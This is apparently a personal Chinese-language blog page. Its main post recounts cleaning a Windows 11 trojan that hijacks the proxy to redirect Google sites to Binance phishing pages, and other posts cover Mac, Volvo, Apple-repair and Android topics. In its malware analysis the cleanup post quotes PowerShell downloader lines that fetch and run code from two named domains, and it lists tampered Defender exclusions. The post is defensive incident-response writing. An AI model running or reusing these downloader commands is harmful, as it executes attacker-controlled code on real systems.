2026年6月27日 星期六

Google相關網頁 (Youtube, gmail)被綁架到幣安?記一次 Win11 代理劫持病毒抓蟲實錄

 


1. 檢查本機的 DNS 伺服器設定 (最有可能)

惡意程式通常會竄改您網卡的 DNS,讓您在輸入正確網址(如 youtube.com)時,被導向駭客架設的假網頁伺服器。

  • Win + R 開啟執行視窗,輸入 ncpa.cpl 並按 Enter。

  • 找到您目前正在上網的網路連線(Wi-Fi 或乙太網路),按右鍵選擇「內容」。

  • 在清單中找到並雙擊「網際網路通訊協定第 4 版 (TCP/IPv4)」。

查看下方是否被選取了「使用下列的 DNS 伺服器位址」並填入了不明的 IP。

2. 檢查 Windows Hosts 檔案

有些流氓軟體會直接修改 Windows 系統底層的網址對應表。

  • 開啟檔案總管,前往:C:\Windows\System32\drivers\etc

  • 使用「記事本」開啟名為 hosts 的檔案。

  • 檢查檔案最下方,是否有任何將 google.comyoutube.combinance.com 對應到奇怪 IP 位址的設定。

  • 解法: 如果有,請將那些行刪除,然後存檔(您可能需要將記事本以「系統管理員身分」執行才能存檔)。

3. 檢查您的路由器 (如果手機連同一個 Wi-Fi 也會這樣)

如果您發現不僅是電腦,連手機連上家裡同一個 Wi-Fi 時,開網頁也會被導向這個畫面,那表示您的 Wi-Fi 路由器已經被駭客入侵並竄改了 DNS

  • 解法: 您需要登入路由器的管理後台(通常是 192.168.0.1192.168.1.1),檢查 WAN/LAN 設定中的 DNS 是否被改為不明位址。建議直接將路由器恢復原廠設定 (Reset),並更改路由器的管理密碼。

4. 檢查區域網路 (LAN) 與 Proxy 腳本

很多惡意軟體不會修改 DNS,而是塞入一個隱藏的「自動設定指令碼 (PAC)」,讓您的網頁流量全部繞道去駭客的伺服器。

  • Win + R 開啟執行視窗,輸入 inetcpl.cpl 並按 Enter,開啟「網際網路內容」。

  • 切換到最右邊的 「連線」 分頁。

  • 點擊下方的 「區域網路設定 (LAN settings)」

  • 關鍵檢查: 確認 不要勾選「使用自動設定指令碼」或「為您的區域網路使用 Proxy 伺服器」。這個視窗裡應該只要勾選最上方的「自動偵測設定」即可。如果有被勾選並填入奇怪的網址,請取消勾選並按確定。

5. 重設網路通訊協定 (Winsock) 與清除 DNS 快取

如果 Windows 底層的網路介面被植入了惡意攔截器(LSP 劫持),常規的設定畫面是看不出來的,我們需要從指令列將網路底層重置。

  • 點擊 Windows 開始按鈕,搜尋 cmd

  • 在「命令提示字元」上按右鍵,選擇 「以系統管理員身分執行」

  • 輸入以下指令並按 Enter 執行:netsh winsock reset

  • 接著輸入以下指令並按 Enter 執行:ipconfig /flushdns

  • 完成後,請將電腦重新開機,再測試看看網頁是否恢復正常。

6. 檢查瀏覽器捷徑是否被「加料」

有時候設定都是正常的,但惡意軟體修改了您桌面或工作列上的瀏覽器捷徑,讓瀏覽器啟動時自動掛載惡意指令。

  • 在桌面或工作列的 Chrome / Edge 圖示上按右鍵。

  • 再對著選單裡的 Google Chrome / Microsoft Edge 按右鍵,選擇 「內容」

  • 檢查 「目標 (Target)」 欄位。正常情況下,路徑應該以 chrome.exe"msedge.exe" 結尾。

  • 如果引號後面被偷偷加上了類似 --proxy-server=... 或一段奇怪的網址,請將那些多出來的字元刪除,然後點擊「套用」。


結果用4, 檢查區域網路(LAN) 與Proxy 看到奇怪的設定,就是用Win+R 輸入 inetcpl.cpl 選連線,再選Lan


之後的步驟

步驟一:立即解除 Proxy 攔截 

  1. 在「區域網路 (LAN) 設定」視窗中,取消勾選「為您的 LAN 使用 Proxy 伺服器」。

  2. 確保只勾選最上面的「自動偵測設定」。

  3. 點擊「確定」後,再點擊「套用」。

  • 注意:做完這步後,應該會暫時恢復正常,可以上 Google 了。但如果不把惡意程式殺掉,它過一陣子或重開機後,很可能會自己再把這個 Proxy 勾回來。

步驟二:找出並終止惡意處理程序 

既然我們知道惡意程式躲在連接埠 59104,我們就可以用指令把它揪出來:

  1. 點擊 Windows 開始按鈕,搜尋 cmd

  2. 在「命令提示字元」上按右鍵,選擇「以系統管理員身分執行」。

  3. 輸入以下指令並按 Enter: netstat -ano | findstr 59104

  4. 您會看到一行結果,最右邊會有一組數字(例如 8732),這就是該惡意程式的處理程序識別碼 (PID)

  5. Ctrl + Shift + Esc 打開「工作管理員」。

  6. 切換到左側的「詳細資料」分頁。

  7. 點擊上方的「PID」欄位來排序,找到剛剛那組數字。

  8. 看看這個 PID 對應的是什麼名稱的執行檔(.exe)。找到後,對它按右鍵選擇「開啟檔案位置」(記下這個惡意檔案藏在哪裡),然後再對它按右鍵選擇「結束工作」。

最後發現這個…




但怎麼清也清不掉,用windows defender 還是殺毒的軟體都清不掉。
進安全模式殺了後,回去正常模式還會跑出來…
很難纏的對手


一、症狀

這類感染常見症狀:

1. Windows Proxy 被自動打開
2. 瀏覽器被導向奇怪網站
3. 要求登入 Binance / 幣安 / 加密貨幣帳號
4. C:\Windows\System32 裡出現奇怪資料夾
5. 刪掉後重開機又回來
6. Defender / Malwarebytes 一開始可能掃不到

本案例中的惡意資料夾名稱類似:

C:\Windows\System32\OSSoftwareInstallerLatest-07jn5i

裡面可能有:

node.exe
app.js
preload.js
*.node

整理一次實際遇到的 Windows 木馬清除經驗。這類病毒的特徵是:你看到惡意資料夾、奇怪的 node.exe,甚至手動刪掉後,重開機或連網後又會自動回來。

真正的問題通常不是那個檔案本身,而是背後有排程工作、PowerShell downloader、Defender 排除項等持久化機制。只刪檔案不會乾淨,必須把「讓它復活的機制」一起刪掉。


二、先斷網

第一步,先拔網路線或關閉 Wi-Fi。

原因是這類木馬可能會透過 PowerShell 重新下載 payload。斷網可以避免它繼續下載惡意檔案或回傳資料。


三、下載並執行 Autoruns

用另一台乾淨電腦下載 Microsoft Sysinternals Autoruns,然後複製到中毒電腦。

在中毒電腦上:

Autoruns64.exe → 右鍵 → 以系統管理員身分執行

等待 Autoruns 掃描完成。


四、搜尋可疑排程與啟動項

在 Autoruns 裡按:

Ctrl + F

搜尋以下關鍵字:

OSSoftwareInstaller
node.exe
powershell
iwr
iex
westgroupfields
cloudsmeadow

本案例中找到的關鍵持久化點是排程工作:

Microsoft\Windows\Integrity\OSSoftwareInstallerLatest-07jn5i

內容含 PowerShell 下載器,例如:

iex (iwr -useb westgroupfields.com)
iex (iwr -useb cloudsmeadow.info)

這就是病毒會「刪掉又回來」的原因。


五、刪除惡意排程

可以在 Autoruns 裡直接取消勾選或刪除可疑項目。

也可以用系統管理員 PowerShell 查詢:

Get-ScheduledTask | Where-Object {
    $_.TaskName -match "OSSoftwareInstaller" -or
    $_.TaskPath -match "Integrity"
}

確認看到可疑排程後刪除:

Unregister-ScheduledTask `
-TaskPath "\Microsoft\Windows\Integrity\" `
-TaskName "OSSoftwareInstallerLatest-07jn5i" `
-Confirm:$false

如果 TaskName 不完全相同,請以實際看到的名稱為準。


六、結束可疑程序並刪除惡意資料夾

先檢查是否有相關程序在執行:

Get-Process | Where-Object {
    $_.ProcessName -match "node|powershell|Updater"
}

如果看到可疑的 node.exe 或奇怪的 Updater.exe,可以先結束:

Stop-Process -Name node -Force -ErrorAction SilentlyContinue

然後刪除惡意資料夾:

Remove-Item "C:\Windows\System32\OSSoftwareInstallerLatest-07jn5i" -Recurse -Force

如果資料夾名稱不同,請改成實際看到的名稱。


七、清除 Windows Defender 排除項

這類木馬可能會把 Windows Defender 的排除項打開,讓 Defender 不掃它。

先查看 Defender 排除項:

Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess

如果看到類似以下內容,就很可疑:

C:\WINDOWS\system32
powershell.EXE
C:\Users\<user>\1
C:\Program Files\Virtual Desktop Streamer\Updater.exe

移除可疑排除項:

Remove-MpPreference -ExclusionPath "C:\WINDOWS\system32" -ErrorAction SilentlyContinue
Remove-MpPreference -ExclusionPath "C:\Users\$env:USERNAME\1" -ErrorAction SilentlyContinue
Remove-MpPreference -ExclusionProcess "powershell.EXE" -ErrorAction SilentlyContinue

再次確認:

Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess

理想狀態是排除項清空,或至少沒有可疑項目。


八、重設 Proxy

這類病毒常會修改 Windows Proxy。

可以先到 Windows 設定確認:

設定 → 網路和網際網路 → Proxy

關閉:

使用 Proxy 伺服器

也可以用指令重設:

netsh winhttp reset proxy

再檢查目前使用者的 Proxy 設定:

Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" |
Select ProxyEnable, ProxyServer

如果 ProxyEnable1,可以關閉:

Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name ProxyEnable -Value 0
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name ProxyServer -ErrorAction SilentlyContinue

九、更新 Defender 並掃描

先更新 Windows Defender 病毒碼:

Update-MpSignature

執行完整掃描:

Start-MpScan -ScanType FullScan

再執行 Defender Offline Scan:

Start-MpWDOScan

電腦會重開機並進行離線掃描。


十、檢查 Defender 偵測紀錄

掃描後可以查看 Defender 偵測紀錄:

Get-MpThreat | Format-List *

以及:

Get-MpThreatDetection | Format-List *

本案例中後來看到的偵測名稱包含:

Trojan:Win32/Malgent
Trojan:PowerShell/JSCeal.AIVB!ams
VirTool:Win32/DefenderTamperingRestore
HackTool:Win32/WebBrowserPassView

其中一個可疑 installer 是:

C:\Users\<user>\Downloads\x64-v58.833.6-install.exe
C:\Users\<user>\Downloads\x64-v58.833.6-install (1).exe
C:\Users\<user>\Downloads\x64-v58.833.6-install (2).exe

後續 payload 則出現在:

C:\Users\<user>\1\Updater.exe

十一、檢查隔離區,不要還原

查看 Defender 隔離清單:

& "$env:ProgramData\Microsoft\Windows Defender\Platform\$((Get-ChildItem "$env:ProgramData\Microsoft\Windows Defender\Platform" | Sort-Object Name -Descending | Select-Object -First 1).Name)\MpCmdRun.exe" -Restore -ListAll

如果看到病毒檔案已被隔離,例如:

x64-v58.833.6-install.exe
x64-v58.833.6-install (1).exe
x64-v58.833.6-install (2).exe

不要還原,不要執行。

保留隔離狀態即可。


十二、重開機驗證

清除後重開機,確認以下事項:

  • 惡意資料夾沒有回來。
  • Proxy 沒有自動打開。
  • Autoruns 沒有可疑排程。
  • Defender 排除項沒有可疑項目。
  • 瀏覽器沒有再被導向奇怪網站。

再次檢查排程:

Get-ScheduledTask | Where-Object {
    $_.TaskName -match "OSSoftwareInstaller" -or
    $_.TaskPath -match "Integrity"
}

如果沒有輸出,代表該排程已清除。


十三、帳號安全處理

因為本案例出現 WebBrowserPassView 類偵測,代表可能涉及瀏覽器密碼或憑證竊取風險。

建議用乾淨裝置處理以下事項:

  • 更改 Google 密碼。
  • 更改 Microsoft / Apple 密碼。
  • 更改 Binance / 交易所密碼。
  • 更改銀行、券商、信用卡相關帳號密碼。
  • 檢查 Google 最近登入裝置。
  • 登出所有不明裝置。
  • 檢查 Binance API Key、提款白名單、裝置管理。
  • 開啟或重設 2FA。

Chrome / Edge 內儲存過的重要密碼,建議全部視為可能外洩,重新設定。


十四、判斷是否清乾淨

可以暫時認為清除成功的條件:

  • 重開機後惡意資料夾沒有重生。
  • Proxy 不再自動被打開。
  • Defender 排除項已清除。
  • Autoruns 沒有可疑排程。
  • Defender Full Scan / Offline Scan 沒有新威脅。
  • Get-MpThreatDetection 顯示 ActionSuccess=True
  • 連網後觀察一段時間沒有復發。

本案例感染鏈整理

可疑 installer:
x64-v58.833.6-install.exe

後續 payload:
C:\Users\<user>\1\Updater.exe

惡意行為:
PowerShell downloader
Defender tampering
新增 Defender exclusion
建立 Scheduled Task
System32 內建立 Node.js payload
修改 Windows Proxy
導向 Binance / 加密貨幣相關頁面

最重要觀念

不要只刪 node.exe 或惡意資料夾。

真正要處理的是:

Scheduled Task
PowerShell Downloader
Defender Exclusion
Proxy 設定
後續 payload

否則資料夾刪掉後,排程下一次又會把它下載回來。

這類感染的重點不是「看到什麼檔案就刪什麼檔案」,而是要找到誰讓它復活。Autoruns 在這種情況下非常有用,因為它可以把啟動項、排程、服務、常駐機制一次攤開來看。


提醒:以上內容是針對本案例整理出的處理流程。不同感染可能有不同檔名、路徑與排程名稱。操作前請確認自己看到的項目確實可疑,不要任意刪除正常系統檔案。如果不確定,建議先備份重要資料,或請熟悉 Windows 安全的人協助判斷。

2018年12月20日 星期四

手賤日記 2014 Mid Macbook Pro Nvme 固態硬碟更換及休眠後無法喚醒解決方法

2014的 Macbook pro 可以經由換 Nvme SSD 升級。

非常簡單

1. 底板的10顆星型螺絲拆下它 (照順序放好,上面兩顆是跟其他不一樣的,混用會出事)

2. 拔除電池電源 (非常重要,一定要拔,不拔SSD會很容易掛)

3. 卸下原本SSD螺絲,把SSD拔除

4. 裝上轉接板,再把新的SSD裝上

5. 接回電池connector

6. 裝回底板

7. 用安裝USB開機,重新作分割區,再用Time Mechniam 回復

8. 快樂享受

啊… 休眠後會死機啊…

因為2014年的開機Boot Rom是沒有NVMe的Driver的,所以,一定會死,網路上流傳的用對硬碟就不會死的傳言,99%都是假的…
大部份覺得不會的是,根本是沒有休眠到,所以不會死

那…要怎麼搞呢?

先要買一個Bios燒錄器 (NT.150),還有Mac專用的Bios連接線 Taobao 有,大約1000元NT,
找到2015年Mac的Nvme Driver
把他加到2014的Boot rom內

過程蠻複雜,我有時間再寫,如果有人敲碗,我可以寫快一點


Volvo 2014 2015 2016 2017 2018 V60 S60 XC60 杯架橡皮墊更換方式

Volvo這個杯架的設計有點問題,大約四年後橡膠的固定片就會開始裂掉
變成缺牙,我的車大約是快五年時。一旦強迫症上身,看起來就是非常的不開心
網路上關於更換這個的文章非常少,不知道是不是大家都無視,但是我看的就非常難過呀
昨天我試著拆了一下,發現長的很像的前一代橡膠片是不能用的

現在跟大家分享一下我的經驗

網路上可以很輕鬆找到的是這個

















東西長的很像,但是如果你是14年後的車,這個不能用,角落的地方會夾不到

那怎麼分別呢
14年後的車型杯架,


















藍色的部份轉角如果是一體不能分離,那應該是14年後的,要換這個橡皮會很辛苦
要幾乎把中控跟中央扶手都拆了,才能把他換下來
不熟的話,工作時間應該要2小時左右
可以考慮一下,如果手賤不自己修不爽的話,倒是蠻建議自己換的

正確的料號是這個
31351785
中間沒有斷開


















1. 拆下冷氣口,可以買工具來拆
    工具如下
     https://goods.ruten.com.tw/item/show?21604746951476
     類似就好,不一定要一樣

2. 拆下中控面板,一共6個螺絲,正面四個,後面兩個
    拆下中控面板 connector, 線連在中控背面,可以用工具翹開

可以參考以下影片
Removing The Volvo V60 (2012) Headunit / Stereo


3. 拆下中央扶手,在排檔後面有兩個螺絲,扶手置物箱內有一片橡膠墊,中間有一個凸起的地方,用力抓著把他拔下來。 這時可以看到內部有四個螺絲 (取下時小心,螺絲很容易掉到置物箱洞內)


4. 中央扶手拆下後,掀開一點點,把杯架的電燈線及點煙器連接線拔除。
    後面的線不用拔,也不好拔,不用動他

5. 這時己經可以把杯架從中央扶手分離了,有四個螺絲,前面的很好找,後面的要認真找一下,先拔前面,再拔後面的螺絲,比較不會壞掉。螺絲都是黑的,銀色的螺絲是杯架模組的螺絲,不用拆。


6. 杯架拆下後,要把杯底與架身分離,有兩種共九個螺絲,拆完後就可以分離
    分離的時候要按下藍色箭頭的地方才會分離
     杯架長這樣



7. 分離後,就可以看到橡膠片了…
    藍色箭頭就是橡膠片…


大功告成,把新的零件換上,反序把所有東西裝上

這設計的人還真夭壽,這麼容易壞的東西,還設計的這麼難換,維修的工程師應該會很生氣…

辛苦了,喝口茶,輕鬆一下~

1/14 update:
第一次拆,花了兩個半小時左右,第二次拆,換到好約1小時6分,大家還是要注意一下,看看自己拆划不划算喔






2018年11月4日 星期日

MacBook Pro 螢幕脫膜問題處理

我的Macbook pro是2014年中的時候買的,那時候是EMBA的最後一年,想說用學生身份買比較便宜XD,也用一直用他來寫論文,但是Mac 的 word 跟 Windows 的 word 轉換上有些麻煩,所以也寫了個處理方法。離題了 XD

最近呢我的MacBook中了防反光膜脫掉的問題,話說這防反光鍍膜是真的很不錯,非常有質感,讓Mac的螢幕加分不少,但是他有個問題,就是他太脆弱了。本來一直想不會遇到這個問題的,結果,還是碰上了,於是趕快上網查,印像中有免費處理。

一查,大概分兩派,一派是四年內可以處理,一派是底下的連結所示
https://kknews.cc/digital/jjq4xj6.html



換算起來是五年。

當然,我相信了來得及的那個XD,當然是怕怕的,因為Apple要修東西要排隊不是想去就可以去的,所以打電話去問Apple客服確認一下。

客服小哥:喔,是鍍膜問題啊!

然後他問了些基本資料。

客服小哥再說:你這個要去現場看看,我們這理沒有辦法決定是不是人為的。
我問說:維修要不要錢?
客服小哥又回我:這個我們不清楚,要現場看看是不人為才有辦法決定。

聽起來就是如果不是人為的話,就可以修的。
事不宜遲,小哥雖然約不到時間,但是我自己運氣不錯,當天晚上就約到了位子,趕去101送修。

到了現場,來了一個操廣東口音的服務員~

客服:先生哩好,有什麼問題嗎?
我:你看這鍍膜,花了
客服:喔!鍍膜問題。
我:請問可以修嗎?
客服:雷個雷個,克以的,我們看一下,是要多少錢。

阿娘喂!我一看16000多。

我:那這樣意思是沒有保固嘍?為什麼呢?
客服:雷個公司系統系不冷改的,我們忌已系不能動的,公司系統傷面系16000我們就不能動了,所以系沒有保固的。
誐:喔…好的…

大家,我幫大家証明了,2014年前的,不用去了,不會修的。

如果大家有不同的經驗,到現在(2018.12)  還是可以修,下面留個言吧,謝謝~

2018年5月23日 星期三

製作 Mac 系統開機碟時出現 xxxx is not a valid volume mount point. 解決辦法

製作 Mac 系統開機碟時出現 xxxx is not a valid volume mount point. 解決辦法

第一個,會出現這個訊息的原因基本上就是 mount point 打錯了。
如果你檢查確定沒有打錯,那就可能是其他的原因了 (廢話)
好,進入正題
以下是我遇到的問題


Last login: Wed May 23 21:08:26 on ttys000
Wildcat-Mac:~ maxchao415$ sudo /Applications/Install\ macOS\ High\ Sierra.app/Contents/Resources/createinstallmedia --volume /Volumes/highsierra --applicationpath /Applications/Install\ macOS\ High\ Sierra.app
Password:
/Volumes/highsierra --applicationpath is not a valid volume mount point.

Wildcat-Mac:~ maxchao415$ sudo /Applications/Install\ macOS\ High\ Sierra.app/Contents/Resources/createinstallmedia --volume /Volumes/highsierra --applicationpath /Applications/Install\ macOS\ High\ Sierra.app
Ready to start.
To continue we need to erase the volume at /Volumes/highsierra.
If you wish to continue type (Y) then press return: y
Erasing Disk: 0%... 10%... 20%... 30%...100%...
Copying installer files to disk...


可以看到訊息出現,/Volumes/highsierra --applicationpath is not a valid volume mount point.
有沒有注意到多出現了 --applicationpath,可是 --applicationpath不是裝載點呀,他是一個指令才對
那為什麼會這樣,我的猜測是,這幾個字"空格/dash/dash/applicationpath"有點問題,我把"空格/dash/dash/
重打之後,最後一排的指令就成功了。
有一樣的困擾嗎?試試吧

2018年1月15日 星期一

Android 手機免 root 開啟 Wakelock Detector

Android 手機最另人討厭的情況就是背景常常有一些討人厭的程式在跑,讓手機待機時間變的短,手機待機時間一短的話,人就會變的很不舒服^^,但其實如果好好控制的話,Android 是有機會可以比 ios 系統更省電的。

Android 手機都會自己休眠,但是一些大陸來的程式,常常不太愛讓手機睡著,什麼騰訊視頻啦,Sogo地圖啦,DD打車啦,都是有名的吃電怪獸。為什麼手機都不能休眠呢?因為程式設計者會用一個叫Wakelock的程序,主要目的是叫醒電話,在背景下執行些東西,有關Wakelock的解說如下

在Android app or framework, 如果不想讓系統進入suspend(休眠)狀態的話,
就必須取得wakelock(喚醒鎖), 並且要小心管理wakelock, 一旦沒有釋放wakelock的話系統就會處在無法suspend的狀態, 大大的增加耗電的速度!
Android SDK官網也有特別強調:
Device battery life will be significantly affected by the use of this API. Do not acquire PowerManager.WakeLocks unless you really need them, use the minimum levels possible, and be sure to release them as soon as possible.
意思就是沒事不要亂取wakelock,取了也盡量用最小level的wakelock,並且盡快釋放wakelock.
以上來自 https://ithelp.ithome.com.tw/articles/10156966
那怎麼看到底有哪些程式在背後 亂來 執行Wakelock呢???來到主題了,有一個叫Wakelock Detector的程式,望名生義,就是Wakelock的偵測程式。但是比較麻煩的是,他必須在 root 的情況下工作,但是,有時候我們不太想讓手機root,那該怎麼辦呢?

那接下來讓我們來看一下如何可以不用root就讓Wakelock Detector工作。

Step 1:

下載 minimal adb fastboot drivers:
安裝完之後直接Launch, 會跑出command window, 預設的位置是在:
 C:\Program Files (x86)\Minimal ADB and Fastboot>
這個目錄裡應該有adb.exe等除錯用的工具軟體

Step 2:

確定手機已經由USB連接上電腦, 而且"設定->開發人員選項->USB偵錯"有勾選
開發人員選項開啟通常是在手機版本的選項連按10下,就可以獲得。
這時手機上可能會跳出視窗, 詢問要不要讓這台電腦執行USB偵錯, 請回答yes確認.

Step 3:

 在PC端的command window裡打以下指令
 切到  minimal ADB tools的目錄下
  1. "adb kill-server"
  2. "adb start-server"
  3. "adb devices"

  此時會出現: List of devices, 而且會秀出你由USB port連接上的手機序號
  手機序號之後不能是"offline", 應該要出現"device"

Step 4: 

在Chrome 下打開插件 unlock Wakelock,此時應該可以作動作了,下圖是沒有發現手機的情況,Step 3的動作要確實。


如果有看到手機的話,會顯示類似下圖的畫面
選Grant, 應該會看到成功的文字訊息。

此step部份來自
https://www.ptt.cc/bbs/Android/M.1404875115.A.3AE.html

那有問題的程式該怎麼辦?砍掉?很不方便吧…不能一直下載移除吧…
來…請服用,"綠色守護",可以用它,把有問題的程式都綠色化,這軟體會強迫不該常駐的程式停用,很方便吧。

那你有電池不給力的問題嗎?現在就去試試吧!

2017年4月13日 星期四

買 iPhone 您必需要注意的維修政策及品質狀況

這幾年,也買了不少apple的東西
32000多的手機,真的是貴…



以上都是現役的東西,還有除役的,買來送長輩的,也算是蠻忠實的客戶啦

回歸正題,最近試著維修iPhone 但是真的有些不太愉快的經驗,想讓大家了解一下,分享一下我失敗的處理方式
讓大家不用重蹈覆轍
其實我一直很信任apple的,很久之前ipad有電池上的問題,兩三年後apple 自主 recall,還換了一個新ipad
著實讓我覺得這是非常負責的做法

但是目前事情好像沒有這麼好了
我的iphone 6s plus 左上角螢幕有暗角的問題,大約買來半年後就有這樣的情況
01上面很多,搜搜就可看到

一開始想說還可以忍受,晶片又是台積做的,真的很怕換了一支問題更多,就打消念頭
結果最近看到親戚的iphone 6 plus,一年半左右的機器,暗角非常明顯,而且大

照片侯補

因為看到後真的覺得不太能接受以後惡化的結果,就興起想換個正常的產品的念頭
上去網站約好時間,(你沒看錯,現在studio A 都要約時間了)
等了五六天,我送去維修站,一開始,似乎收件員也知道這樣的問題,打好單,檢查有沒有變形
準備送了,結果,他發現我的耳機孔旁邊有一個小小的凹痕,連我都是今天才發現的
凹痕如下…我的iphone 只有這個部份有問題喔,其他都沒有傷,連刮痕都沒有



至此,急轉直下,他告訴我,apple對這樣的審核很嚴,會認定是人為損壞,他知道這樣不合理,
但是他送到apple,他們一定不給修,之前有一個這樣的案例,工程師還要出錢付等等…
如果要送,要收1萬多換新機…

要我直接打電話給apple 看他們願不願意修,他們會叫你傳照片什麼的給他確定。但是現在apple都休息了(7:30pm),可能沒辦法處理,請我回家,明天再打

今天,我打給apple,他們回覆我,他們的政策是,如果你的手機螢幕有問題,但是機身上有括痕,有傷…
必需先付費把這些東西修好,他們才能處理其他的修復,這是他們的政策
我回,這合理嗎?如果我汽車引擎有問題,但是我的鈑金上有小小的撞痕,汽車公司要求你要修好這個撞痕才要幫你出保修引擎
這樣合理嗎?他笑笑回,不合理,但是這就是apple的政策
他也沒有打算看我的機器是有什麼傷,說他們也沒有辦法,是維修商決定的
至此真的有求助無門的感覺,反正踢來踢去就對了…
最後說,不然請我再去維修中心,如果他們再拒收,再現場打他給他們,他們再"幫忙溝通"…

算了我認了,放棄,人生還有許多事情要忙,我沒有辦法吃飽閒閒每天去吵架,搞壞自己心情
保固只剩兩天,對不起,我錯了,沒有出問題之後馬上就修,我錯了,我沒有好好對我的iphone
所以我的機器有個小凹痕。要修螢幕得要1萬多
APPLE你們真的屌,當你供應商的時候,被你刁,當你客戶,又被你刁


雖然我放棄了,但是提醒大家,
1. 買apple東西小心,出問題要趕快出保,不然時間拖一拖,你就不用修了,因為預約真的很麻煩
2. 然後千萬小心,不能有什麼磕磕碰碰的,不然也別想修。
3. 真的想抗議,請在商家拒收的時候,打給APPLE,他們晚上九點後才下班,不要被維修商騙了
至於當埸打電話有沒有用,我不知道,試試看吧,如果成功的話給大家參考一下,做個功德

還好我只是小問題,如果是機板壞掉之類的,真的是欲哭無淚
保護貼重新貼上,繼續用,希望以後不要一大塊黑掉…